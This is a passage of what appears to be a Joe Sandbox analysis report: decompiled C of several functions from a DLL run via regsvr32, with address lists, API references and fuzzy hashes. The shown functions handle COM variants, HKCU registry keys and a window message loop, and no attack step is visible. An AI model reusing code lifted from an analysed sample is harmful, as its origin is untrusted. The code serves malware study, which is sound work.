						_t130 =  *((intOrPtr*)(_t122 + 0x48));
						if( *((intOrPtr*)(_t122 + 0x48)) == 0) {
							_t89 =  *((intOrPtr*)(_t122 + 0x40)) +  *(_t123 - 0x18);
							__eflags = _t89;
						} else {
							_t103 = E10019F87(_t108, _t122, _t116, _t120, _t122, _t130);
							 *(_t123 - 4) = 1;
							E1001BDD4(_t103, _t123 - 0x48, _t103);
							 *(_t123 - 4) = 0;
							__imp__#9(_t123 - 0x58, _t123 - 0x58,  *(_t123 - 0x10) + 1);
							_t89 = _t123 - 0x48;
						}
						 *((intOrPtr*)(_t123 - 0x38)) = _t89;
						 *((intOrPtr*)(_t123 - 0x34)) = _t123 - 0x24;
						 *((intOrPtr*)(_t123 - 0x30)) = 1;
						 *((intOrPtr*)(_t123 - 0x2c)) = 1;
						 *(_t120 + 0x88) = 1;
						_t93 =  *((intOrPtr*)(_t120 + 0x50));
						if(_t93 != 0) {
							_t116 = _t123 - 0x1c;
							_push(_t123 - 0x1c);
							_push(0x1003b21c);
							_push(_t93);
							if( *((intOrPtr*)( *_t93))() >= 0) {
								_t96 =  *((intOrPtr*)(_t123 - 0x1c));
								_t116 = _t123 - 0x38;
								 *((intOrPtr*)( *_t96 + 0x18))(_t96,  *((intOrPtr*)(_t120 + 0x9c)), 0x1003b19c, 0, 4, _t123 - 0x38, 0, _t123 - 0x78, _t123 - 0x28);
								_t98 =  *((intOrPtr*)(_t123 - 0x1c));
								 *((intOrPtr*)( *_t98 + 8))(_t98);
								 *(_t120 + 0x88) =  *(_t120 + 0x88) & 0x00000000;
								if( *((intOrPtr*)(_t123 - 0x74)) != 0) {
									__imp__#6( *((intOrPtr*)(_t123 - 0x74)));
								}
								if( *((intOrPtr*)(_t123 - 0x70)) != 0) {
									__imp__#6( *((intOrPtr*)(_t123 - 0x70)));
								}
								if( *((intOrPtr*)(_t123 - 0x6c)) != 0) {
									__imp__#6( *((intOrPtr*)(_t123 - 0x6c)));
								}
								 *(_t123 - 0x14) =  *(_t123 - 0x14) + 1;
								 *(_t123 - 0x18) =  *(_t123 - 0x18) + 0x10;
							}
						}
						 *(_t123 - 4) =  *(_t123 - 4) | 0xffffffff;
						__imp__#9(_t123 - 0x48);
					} while ( *((intOrPtr*)(_t123 - 0x20)) != 0);
					L17:
					 *(_t123 - 0x10) =  *(_t123 - 0x10) + 1;
				} while ( *(_t123 - 0x10) <  *((intOrPtr*)(_t122 + 0x10)));
				goto L18;
			}














                                                                                                            0x1001a49e
                                                                                                            0x1001a49e
                                                                                                            0x1001a4a5
                                                                                                            0x1001a4aa
                                                                                                            0x1001a4b1
                                                                                                            0x1001a4b8
                                                                                                            0x1001a4bb
                                                                                                            0x1001a4be
                                                                                                            0x1001a624
                                                                                                            0x1001a624
                                                                                                            0x1001a62f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001a4c4
                                                                                                            0x1001a4c4
                                                                                                            0x1001a4ca
                                                                                                            0x1001a4cd
                                                                                                            0x1001a4d3
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001a4d9
                                                                                                            0x1001a4de
                                                                                                            0x1001a4e1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001a4ed
                                                                                                            0x1001a4f0
                                                                                                            0x1001a500
                                                                                                            0x1001a50a
                                                                                                            0x1001a511
                                                                                                            0x1001a516
                                                                                                            0x1001a51d
                                                                                                            0x1001a522
                                                                                                            0x1001a526
                                                                                                            0x1001a52a
                                                                                                            0x1001a55f
                                                                                                            0x1001a55f
                                                                                                            0x1001a52c
                                                                                                            0x1001a537
                                                                                                            0x1001a540
                                                                                                            0x1001a544
                                                                                                            0x1001a54d
                                                                                                            0x1001a551
                                                                                                            0x1001a557
                                                                                                            0x1001a557
                                                                                                            0x1001a562
                                                                                                            0x1001a568
                                                                                                            0x1001a56e
                                                                                                            0x1001a571
                                                                                                            0x1001a574
                                                                                                            0x1001a57a
                                                                                                            0x1001a57f
                                                                                                            0x1001a583
                                                                                                            0x1001a586
                                                                                                            0x1001a587
                                                                                                            0x1001a58c
                                                                                                            0x1001a591
                                                                                                            0x1001a593
                                                                                                            0x1001a5a2
                                                                                                            0x1001a5b6
                                                                                                            0x1001a5b9
                                                                                                            0x1001a5bf
                                                                                                            0x1001a5c2
                                                                                                            0x1001a5cd
                                                                                                            0x1001a5d2
                                                                                                            0x1001a5d2
                                                                                                            0x1001a5dc
                                                                                                            0x1001a5e1
                                                                                                            0x1001a5e1
                                                                                                            0x1001a5eb
                                                                                                            0x1001a5f0
                                                                                                            0x1001a5f0
                                                                                                            0x1001a5f6
                                                                                                            0x1001a5f9
                                                                                                            0x1001a5f9
                                                                                                            0x1001a591
                                                                                                            0x1001a5fd
                                                                                                            0x1001a605
                                                                                                            0x1001a60b
                                                                                                            0x1001a615
                                                                                                            0x1001a615
                                                                                                            0x1001a61b
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 1001A4A5
                                                                                                            • _memset.LIBCMT ref: 1001A511
                                                                                                              • Part of subcall function 1001BDF4: _memset.LIBCMT ref: 1001BDFC
                                                                                                            • VariantClear.OLEAUT32(?), ref: 1001A551
                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 1001A5D2
                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 1001A5E1
                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 1001A5F0
                                                                                                            • VariantClear.OLEAUT32(00000000), ref: 1001A605
                                                                                                              • Part of subcall function 10019F87: __EH_prolog3.LIBCMT ref: 10019FA3
                                                                                                              • Part of subcall function 10019F87: VariantClear.OLEAUT32(?), ref: 1001A008
                                                                                                              • Part of subcall function 1001BDD4: VariantCopy.OLEAUT32(?,?), ref: 1001BDE2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Variant$ClearFreeString$H_prolog3_memset$Copy
                                                                                                            • String ID:
                                                                                                            • API String ID: 2905758408-0
                                                                                                            • Opcode ID: 6b551a76efa184ea6f413da9726cfbd70e5b0d5117deedbe95520abb89a41a64
                                                                                                            • Instruction ID: ceb74f55e44ee9bcef50cea17c44e0e4c1adfe79803e4b69d5972ce8ea6398f3
                                                                                                            • Opcode Fuzzy Hash: 6b551a76efa184ea6f413da9726cfbd70e5b0d5117deedbe95520abb89a41a64
                                                                                                            • Instruction Fuzzy Hash: 3551F271A006099FDB51CFA4C884BEEBBF9FF49305F104529E116EB292DB74E984CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10017235 Relevance: 10.6, APIs: 7, Instructions: 121COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 53%
                                                                                                            			E10017235(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t59;
				signed int _t63;
				signed int _t64;
				signed int _t69;
				signed int _t70;
				signed int _t71;
				void* _t81;
				intOrPtr* _t82;
				void* _t97;
				signed int _t98;
				void* _t101;
				void* _t102;
				void* _t103;

				_t103 = __eflags;
				_push(0x60);
				E1001FBC4(E1003426F, __ebx, __edi, __esi);
				_t97 =  *(_t101 + 8) + 0xffffff28;
				E1000EC55(_t101 - 0x18, _t103,  *((intOrPtr*)( *(_t101 + 8) - 0xbc)));
				 *(_t101 - 4) = 0;
				if( *((intOrPtr*)(_t97 + 0x88)) != 0) {
					L19:
					 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
					__eflags =  *(_t101 - 0x14);
					if( *(_t101 - 0x14) != 0) {
						_push( *((intOrPtr*)(_t101 - 0x18)));
						_push(0);
						E1000E519();
					}
					_t59 = 0;
					__eflags = 0;
					L22:
					return E1001FC9C(_t59);
				}
				if( *((intOrPtr*)(_t97 + 0x90)) != 0) {
					L6:
					__eflags =  *((intOrPtr*)(_t97 + 0x9c)) -  *(_t101 + 0xc);
					if( *((intOrPtr*)(_t97 + 0x9c)) !=  *(_t101 + 0xc)) {
						goto L19;
					}
					_t81 = _t97 + 0xac;
					__imp__#9(_t81);
					_t63 =  *(_t97 + 0x50);
					__eflags = _t63;
					_t85 = 0 | __eflags != 0x00000000;
					 *(_t101 + 8) = 0;
					__eflags = __eflags != 0;
					if(__eflags != 0) {
						L9:
						_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x1003b21c, _t101 + 8);
						__eflags = _t64;
						if(_t64 < 0) {
							goto L19;
						}
						E10020F40(_t97, _t101 - 0x48, 0, 0x20);
						E10020F40(_t97, _t101 - 0x28, 0, 0x10);
						_t69 =  *(_t101 + 8);
						_t102 = _t102 + 0x18;
						__eflags = _t69;
						_t85 = 0 | __eflags != 0x00000000;
						__eflags = __eflags != 0;
						if(__eflags == 0) {
							goto L8;
						}
						_t70 =  *((intOrPtr*)( *_t69 + 0x18))(_t69,  *(_t101 + 0xc), 0x1003b19c, 0, 2, _t101 - 0x28, _t81, _t101 - 0x48, _t101 - 0x10);
						__eflags =  *(_t101 - 0x44);
						_t82 = __imp__#6;
						 *(_t101 + 0xc) = _t70;
						if( *(_t101 - 0x44) != 0) {
							 *_t82( *(_t101 - 0x44));
						}
						__eflags =  *(_t101 - 0x40);
						if( *(_t101 - 0x40) != 0) {
							 *_t82( *(_t101 - 0x40));
						}
						__eflags =  *(_t101 - 0x3c);
						if( *(_t101 - 0x3c) != 0) {
							 *_t82( *(_t101 - 0x3c));
						}
						_t71 =  *(_t101 + 8);
						 *((intOrPtr*)( *_t71 + 8))(_t71);
						__eflags =  *(_t101 + 0xc);
						if( *(_t101 + 0xc) >= 0) {
							 *((intOrPtr*)(_t97 + 0xa8)) = 1;
						}
						goto L19;
					}
					L8:
					_t63 = E10004E6E(_t81, _t85, _t97, 0, __eflags);
					goto L9;
				}
				 *(_t101 - 0x68) =  *(_t101 + 0xc);
				 *((intOrPtr*)(_t101 - 0x6c)) = 2;
				 *((intOrPtr*)(_t101 - 0x64)) = 0;
				 *((intOrPtr*)(_t101 - 0x60)) = 0;
				 *((intOrPtr*)(_t101 - 0x5c)) = 0;
				 *((intOrPtr*)(_t101 - 0x54)) = 0;
				 *((intOrPtr*)(_t101 - 0x50)) = 0;
				 *((intOrPtr*)(_t101 - 0x4c)) = 0;
				E10014F82(_t97, _t101 - 0x6c);
				if( *((intOrPtr*)(_t101 - 0x54)) == 0) {
					goto L6;
				}
				 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
				_t98 =  *((intOrPtr*)(_t101 - 0x54));
				if( *(_t101 - 0x14) != 0) {
					_push( *((intOrPtr*)(_t101 - 0x18)));
					_push(0);
					E1000E519();
				}
				_t59 = _t98;
				goto L22;
			}
















                                                                                                            0x10017235
                                                                                                            0x10017235
                                                                                                            0x1001723c
                                                                                                            0x1001724a
                                                                                                            0x10017253
                                                                                                            0x10017260
                                                                                                            0x10017263
                                                                                                            0x1001738a
                                                                                                            0x1001738a
                                                                                                            0x1001738e
                                                                                                            0x10017391
                                                                                                            0x10017393
                                                                                                            0x10017396
                                                                                                            0x10017397
                                                                                                            0x10017397
                                                                                                            0x1001739c
                                                                                                            0x1001739c
                                                                                                            0x1001739e
                                                                                                            0x100173a3
                                                                                                            0x100173a3
                                                                                                            0x1001726f
                                                                                                            0x100172bc
                                                                                                            0x100172bf
                                                                                                            0x100172c5
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100172cb
                                                                                                            0x100172d2
                                                                                                            0x100172d8
                                                                                                            0x100172dd
                                                                                                            0x100172df
                                                                                                            0x100172e2
                                                                                                            0x100172e5
                                                                                                            0x100172e7
                                                                                                            0x100172ee
                                                                                                            0x100172fa
                                                                                                            0x100172fc
                                                                                                            0x100172fe
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001730b
                                                                                                            0x10017317
                                                                                                            0x1001731c
                                                                                                            0x10017321
                                                                                                            0x10017324
                                                                                                            0x10017326
                                                                                                            0x10017329
                                                                                                            0x1001732b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10017348
                                                                                                            0x1001734b
                                                                                                            0x1001734e
                                                                                                            0x10017354
                                                                                                            0x10017357
                                                                                                            0x1001735c
                                                                                                            0x1001735c
                                                                                                            0x1001735e
                                                                                                            0x10017361
                                                                                                            0x10017366
                                                                                                            0x10017366
                                                                                                            0x10017368
                                                                                                            0x1001736b
                                                                                                            0x10017370
                                                                                                            0x10017370
                                                                                                            0x10017372
                                                                                                            0x10017378
                                                                                                            0x1001737b
                                                                                                            0x1001737e
                                                                                                            0x10017380
                                                                                                            0x10017380
                                                                                                            0x00000000
                                                                                                            0x1001737e
                                                                                                            0x100172e9
                                                                                                            0x100172e9
                                                                                                            0x00000000
                                                                                                            0x100172e9
                                                                                                            0x10017274
                                                                                                            0x1001727d
                                                                                                            0x10017284
                                                                                                            0x10017287
                                                                                                            0x1001728a
                                                                                                            0x1001728d
                                                                                                            0x10017290
                                                                                                            0x10017293
                                                                                                            0x10017296
                                                                                                            0x1001729e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100172a0
                                                                                                            0x100172a7
                                                                                                            0x100172aa
                                                                                                            0x100172ac
                                                                                                            0x100172af
                                                                                                            0x100172b0
                                                                                                            0x100172b0
                                                                                                            0x100172b5
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeString$_memset$ClearH_prolog3Variant
                                                                                                            • String ID:
                                                                                                            • API String ID: 3574576181-0
                                                                                                            • Opcode ID: 6d4b1ec007ad95306a116e0e912d8190e96039f5086e4f4408e6ab6921ed133c
                                                                                                            • Instruction ID: 2d0dd3affd8f04fec97c60edc25b67d043c515f8611652d59fdaf26af88a8b29
                                                                                                            • Opcode Fuzzy Hash: 6d4b1ec007ad95306a116e0e912d8190e96039f5086e4f4408e6ab6921ed133c
                                                                                                            • Instruction Fuzzy Hash: 66414871900629EFCB01CFA4C8459DEBBB9FF08B50F10851AF529AF155C770AA82CF91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100072BC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 68%
                                                                                                            			E100072BC(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, signed int _a264, char _a268) {
				char _v4;
				intOrPtr _v12;
				char* _v16;
				void* _v20;
				char* _v24;
				char _v28;
				long _v32;
				char _v36;
				char _v272;
				char _v280;
				intOrPtr _v292;
				void* __ebp;
				signed int _t40;
				char _t44;
				void* _t47;
				void* _t54;
				char* _t61;
				void* _t77;
				void* _t80;
				void* _t81;
				intOrPtr _t94;
				void* _t98;
				void* _t100;
				void* _t101;
				char* _t104;

				_t95 = __edx;
				_t81 = __ecx;
				_t79 = __ebx;
				_t104 =  &_v272;
				_t40 =  *0x10045580; // 0x8f64cb61
				_a264 = _t40 ^ _t104;
				_push(0x18);
				E1001FBC4(E1003309F, __ebx, __edi, __esi);
				_t100 = __ecx;
				_v20 = 0;
				_v32 = 0;
				_t44 = E1000701D(__ecx, __edx);
				_v28 = _t44;
				if(_t44 != 0) {
					do {
						__eax =  &_v28;
						_push(__eax);
						__ecx = __esi;
						E1000702E();
						__eflags = __eax - __edi;
						if(__eax != __edi) {
							__edx =  *__eax;
							__ecx = __eax;
							__eax =  *((intOrPtr*)(__edx + 0xc))(__edi, 0xfffffffc, __edi, __edi);
						}
						__eflags = _v28 - __edi;
					} while (_v28 != __edi);
				}
				__eflags =  *(_t100 + 0x54);
				if( *(_t100 + 0x54) == 0) {
					L15:
					 *[fs:0x0] = _v12;
					_pop(_t98);
					_pop(_t101);
					_pop(_t80);
					_t47 = E1001FBB5(1, _t80, _a264 ^ _t104, _t95, _t98, _t101);
					__eflags =  &_a268;
					return _t47;
				} else {
					__eflags =  *(_t100 + 0x68);
					__eflags = 0 |  *(_t100 + 0x68) != 0x00000000;
					if(__eflags != 0) {
						_push("Software\\");
						E1000563B(_t79,  &_v16, 0, _t100, __eflags);
						_v4 = 0;
						E10005500( &_v16,  *(_t100 + 0x54));
						_push(0x10037310);
						_push( &_v16);
						_push( &_v36);
						_t54 = E10007149(_t79, 0, _t100, __eflags);
						_push( *(_t100 + 0x68));
						_v4 = 1;
						_push(_t54);
						_push( &_v24);
						E10007149(_t79, 0, _t100, __eflags);
						_v4 = 3;
						E10001260(_v36 + 0xfffffff0, _t95);
						_push( &_v24);
						_push(0x80000001);
						E100071AD(_t79, 0, 0x80000001, __eflags);
						_t61 = RegOpenKeyA(0x80000001, _v16,  &_v20);
						__eflags = _t61;
						if(_t61 == 0) {
							__eflags = RegEnumKeyA(_v20, 0, _t104, 0x104) - 0x103;
							if(__eflags == 0) {
								_push( &_v16);
								_push(0x80000001);
								E100071AD(_t79, 0, 0x80000001, __eflags);
							}
							RegCloseKey(_v20);
						}
						RegQueryValueA(0x80000001, _v24, _t104,  &_v32);
						E10001260( &(_v24[0xfffffffffffffff0]), _t95);
						__eflags =  &(_v16[0xfffffffffffffff0]);
						E10001260( &(_v16[0xfffffffffffffff0]), _t95);
						goto L15;
					} else {
						_push(_t104);
						_push(_t81);
						_v280 = 0x10044410;
						E100209E8( &_v280, 0x1003e2dc);
						asm("int3");
						_push(4);
						E1001FBC4(E10032E9B, _t79, 0, _t100);
						_t94 = E100105C8(0x104);
						_v292 = _t94;
						_t77 = 0;
						_v280 = 0;
						if(_t94 != 0) {
							_t77 = E1000E58E(_t94);
						}
						return E1001FC9C(_t77);
					}
				}
			}




























                                                                                                            0x100072bc
                                                                                                            0x100072bc
                                                                                                            0x100072bc
                                                                                                            0x100072c3
                                                                                                            0x100072c7
                                                                                                            0x100072ce
                                                                                                            0x100072d4
                                                                                                            0x100072db
                                                                                                            0x100072e2
                                                                                                            0x100072e4
                                                                                                            0x100072e7
                                                                                                            0x100072ea
                                                                                                            0x100072f1
                                                                                                            0x100072f4
                                                                                                            0x100072f6
                                                                                                            0x100072f6
                                                                                                            0x100072f9
                                                                                                            0x100072fa
                                                                                                            0x100072fc
                                                                                                            0x10007301
                                                                                                            0x10007303
                                                                                                            0x10007305
                                                                                                            0x1000730c
                                                                                                            0x1000730e
                                                                                                            0x1000730e
                                                                                                            0x10007311
                                                                                                            0x10007311
                                                                                                            0x100072f6
                                                                                                            0x10007316
                                                                                                            0x10007319
                                                                                                            0x100073f6
                                                                                                            0x100073fc
                                                                                                            0x10007404
                                                                                                            0x10007405
                                                                                                            0x10007406
                                                                                                            0x1000740f
                                                                                                            0x10007414
                                                                                                            0x1000741b
                                                                                                            0x1000731f
                                                                                                            0x10007321
                                                                                                            0x10007327
                                                                                                            0x10007329
                                                                                                            0x10007330
                                                                                                            0x10007338
                                                                                                            0x10007343
                                                                                                            0x10007346
                                                                                                            0x1000734b
                                                                                                            0x10007353
                                                                                                            0x10007357
                                                                                                            0x10007358
                                                                                                            0x1000735d
                                                                                                            0x10007360
                                                                                                            0x10007364
                                                                                                            0x10007368
                                                                                                            0x10007369
                                                                                                            0x10007377
                                                                                                            0x1000737b
                                                                                                            0x10007383
                                                                                                            0x10007389
                                                                                                            0x1000738a
                                                                                                            0x10007397
                                                                                                            0x1000739d
                                                                                                            0x1000739f
                                                                                                            0x100073b4
                                                                                                            0x100073b9
                                                                                                            0x100073be
                                                                                                            0x100073bf
                                                                                                            0x100073c0
                                                                                                            0x100073c0
                                                                                                            0x100073c8
                                                                                                            0x100073c8
                                                                                                            0x100073da
                                                                                                            0x100073e6
                                                                                                            0x100073ee
                                                                                                            0x100073f1
                                                                                                            0x00000000
                                                                                                            0x1000732b
                                                                                                            0x10004e6e
                                                                                                            0x10004e71
                                                                                                            0x10004e7b
                                                                                                            0x10004e82
                                                                                                            0x10004e87
                                                                                                            0x10004e88
                                                                                                            0x10004e8f
                                                                                                            0x10004e9e
                                                                                                            0x10004ea0
                                                                                                            0x10004ea3
                                                                                                            0x10004ea7
                                                                                                            0x10004eaa
                                                                                                            0x10004eac
                                                                                                            0x10004eac
                                                                                                            0x10004eb6
                                                                                                            0x10004eb6
                                                                                                            0x10007329

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 100072DB
                                                                                                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 10007397
                                                                                                            • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 100073AE
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,Software\,00000018), ref: 100073C8
                                                                                                            • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 100073DA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseEnumH_prolog3OpenQueryValue
                                                                                                            • String ID: Software\
                                                                                                            • API String ID: 3878845136-964853688
                                                                                                            • Opcode ID: 21590ef9a5705e8cadcff05ea3144ec4a30fa4c8191d2a2e3559474fe79f2317
                                                                                                            • Instruction ID: 431f38651a312ef553f30843a41239907c7d8c638de5ca089e0c10656c75fbe4
                                                                                                            • Opcode Fuzzy Hash: 21590ef9a5705e8cadcff05ea3144ec4a30fa4c8191d2a2e3559474fe79f2317
                                                                                                            • Instruction Fuzzy Hash: 5C41AC35D00109AFEB11DBA4CC81AEFB7B9FF44380F50052AF555E6295DB38AA44DB61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000A486 Relevance: 10.6, APIs: 7, Instructions: 115windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 96%
                                                                                                            			E1000A486(intOrPtr* __ecx, signed int _a4) {
				struct HWND__* _v4;
				struct tagMSG* _v8;
				int _v12;
				int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t42;
				struct tagMSG* _t43;
				signed int _t45;
				void* _t48;
				void* _t50;
				int _t53;
				long _t56;
				signed int _t62;
				intOrPtr* _t64;
				intOrPtr* _t67;
				void* _t68;

				_t63 = __ecx;
				_t62 = 1;
				_t67 = __ecx;
				_v12 = 1;
				_v16 = 0;
				if((_a4 & 0x00000004) == 0 || (E1000EEC4(__ecx) & 0x10000000) != 0) {
					_t62 = 0;
				}
				_t42 = GetParent( *(_t67 + 0x20));
				 *(_t67 + 0x3c) =  *(_t67 + 0x3c) | 0x00000018;
				_v4 = _t42;
				_t43 = E100069E2(0);
				_t68 = UpdateWindow;
				_v8 = _t43;
				while(1) {
					L14:
					_t73 = _v12;
					if(_v12 == 0) {
						goto L15;
					}
					__eflags = PeekMessageA(_v8, 0, 0, 0, 0);
					if(__eflags != 0) {
						while(1) {
							L15:
							_t45 = E10006DDA(_t63, 0, _t67, _t73);
							if(_t45 == 0) {
								break;
							}
							if(_t62 != 0) {
								_t53 = _v8->message;
								if(_t53 == 0x118 || _t53 == 0x104) {
									E1000EF92(_t67, 1);
									UpdateWindow( *(_t67 + 0x20));
									_t62 = 0;
								}
							}
							_t64 = _t67;
							_t48 =  *((intOrPtr*)( *_t67 + 0x80))();
							_t79 = _t48;
							if(_t48 == 0) {
								_t39 = _t67 + 0x3c;
								 *_t39 =  *(_t67 + 0x3c) & 0xffffffe7;
								__eflags =  *_t39;
								return  *((intOrPtr*)(_t67 + 0x44));
							} else {
								_t50 = E10006CF4(_t62, _t64, 0, _t67, _t68, _t79, _v8);
								_pop(_t63);
								if(_t50 != 0) {
									_v12 = 1;
									_v16 = 0;
								}
								if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
									continue;
								} else {
									goto L14;
								}
							}
						}
						_push(0);
						E10005AC4();
						return _t45 | 0xffffffff;
					}
					__eflags = _t62;
					if(_t62 != 0) {
						_t63 = _t67;
						E1000EF92(_t67, 1);
						UpdateWindow( *(_t67 + 0x20));
						_t62 = 0;
						__eflags = 0;
					}
					__eflags = _a4 & 0x00000001;
					if((_a4 & 0x00000001) == 0) {
						__eflags = _v4;
						if(_v4 != 0) {
							__eflags = _v16;
							if(_v16 == 0) {
								SendMessageA(_v4, 0x121, 0,  *(_t67 + 0x20));
							}
						}
					}
					__eflags = _a4 & 0x00000002;
					if(__eflags != 0) {
						L13:
						_v12 = 0;
						continue;
					} else {
						_t56 = SendMessageA( *(_t67 + 0x20), 0x36a, 0, _v16);
						_v16 = _v16 + 1;
						__eflags = _t56;
						if(__eflags != 0) {
							continue;
						}
						goto L13;
					}
				}
				goto L15;
			}






















                                                                                                            0x1000a486
                                                                                                            0x1000a48f
                                                                                                            0x1000a497
                                                                                                            0x1000a499
                                                                                                            0x1000a49d
                                                                                                            0x1000a4a1
                                                                                                            0x1000a4af
                                                                                                            0x1000a4af
                                                                                                            0x1000a4b4
                                                                                                            0x1000a4ba
                                                                                                            0x1000a4be
                                                                                                            0x1000a4c2
                                                                                                            0x1000a4c7
                                                                                                            0x1000a4cd
                                                                                                            0x1000a545
                                                                                                            0x1000a545
                                                                                                            0x1000a545
                                                                                                            0x1000a549
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000a4e1
                                                                                                            0x1000a4e3
                                                                                                            0x1000a54b
                                                                                                            0x1000a54b
                                                                                                            0x1000a54b
                                                                                                            0x1000a552
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000a556
                                                                                                            0x1000a55c
                                                                                                            0x1000a564
                                                                                                            0x1000a571
                                                                                                            0x1000a579
                                                                                                            0x1000a57b
                                                                                                            0x1000a57b
                                                                                                            0x1000a564
                                                                                                            0x1000a57f
                                                                                                            0x1000a581
                                                                                                            0x1000a587
                                                                                                            0x1000a589
                                                                                                            0x1000a5c4
                                                                                                            0x1000a5c4
                                                                                                            0x1000a5c4
                                                                                                            0x00000000
                                                                                                            0x1000a58b
                                                                                                            0x1000a58f
                                                                                                            0x1000a596
                                                                                                            0x1000a597
                                                                                                            0x1000a599
                                                                                                            0x1000a5a1
